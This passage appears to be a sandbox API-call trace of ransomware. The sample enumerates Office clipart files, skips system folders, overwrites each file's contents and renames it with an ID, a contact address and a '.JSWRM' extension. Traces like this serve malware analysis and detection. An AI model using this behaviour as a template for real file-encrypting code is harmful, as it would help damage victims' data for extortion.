Size=0xa0) returned 0x23cf48 [0098.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0098.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0098.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.554] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00018_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00018_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00018_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00018_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0098.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.555] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x175a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00095_.WMF", cAlternateFileName="")) returned 1 [0098.555] lstrcmpiW (lpString1="TN00095_.WMF", lpString2=".") returned 1 [0098.555] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="..") returned 1 [0098.555] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="...") returned 1 [0098.555] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="windows") returned -1 [0098.555] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="recovery") returned 1 [0098.555] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="perflogs") returned 1 [0098.555] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="documents and settings") returned 1 [0098.556] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.556] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="system volume information") returned 1 [0098.556] lstrcmpiW (lpString1="TN00095_.WMF", lpString2="msocache") returned 1 [0098.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00095_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00095_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00095_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0098.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00095_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00095_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00095_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0098.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0098.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0098.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0098.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.556] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5978) returned 1 [0098.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1750) returned 0x205850 [0098.557] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1750, lpOverlapped=0x0) returned 1 [0098.598] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.598] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1750, lpOverlapped=0x0) returned 1 [0098.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.598] CloseHandle (hObject=0x314) returned 1 [0098.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0098.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0098.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0098.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0098.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0098.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0098.598] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0098.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0098.598] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.598] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00095_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00095_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.599] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0098.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0098.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0098.600] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c12, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00211_.WMF", cAlternateFileName="")) returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2=".") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="..") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="...") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="windows") returned -1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="recovery") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="perflogs") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="documents and settings") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="system volume information") returned 1 [0098.600] lstrcmpiW (lpString1="TN00211_.WMF", lpString2="msocache") returned 1 [0098.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0098.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00211_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00211_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00211_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0098.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0098.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00211_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00211_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00211_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0098.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0098.600] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0098.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.600] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.600] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.601] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7186) returned 1 [0098.601] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.601] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1c10) returned 0x205850 [0098.601] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1c10, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1c10, lpOverlapped=0x0) returned 1 [0098.603] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.603] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1c10, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1c10, lpOverlapped=0x0) returned 1 [0098.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.603] CloseHandle (hObject=0x314) returned 1 [0098.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0098.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0098.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0098.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0098.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0098.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0098.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.604] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00211_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00211_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0098.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0098.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0098.605] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1224, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00217_.WMF", cAlternateFileName="")) returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2=".") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="..") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="...") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="windows") returned -1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="recovery") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="perflogs") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="documents and settings") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="system volume information") returned 1 [0098.605] lstrcmpiW (lpString1="TN00217_.WMF", lpString2="msocache") returned 1 [0098.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00217_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00217_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00217_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0098.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00217_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TN00217_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TN00217_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0098.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0098.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0098.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.605] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0098.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.607] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4644) returned 1 [0098.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1220) returned 0x205850 [0098.607] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1220, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1220, lpOverlapped=0x0) returned 1 [0098.609] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.609] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1220, lpOverlapped=0x0) returned 1 [0098.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0098.609] CloseHandle (hObject=0x314) returned 1 [0098.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0098.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0098.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0098.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0098.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0098.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0098.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0098.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0098.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0098.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0098.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0098.609] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00217_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00217_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0098.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0098.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0098.610] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bc0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TN00218_.WMF", cAlternateFileName="")) returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2=".") returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="..") returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="...") returned 1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="windows") returned -1 [0098.610] lstrcmpiW (lpString1="TN00218_.WMF", lpString2="recovery") returned 1 [0098.610] lstrcmpiW 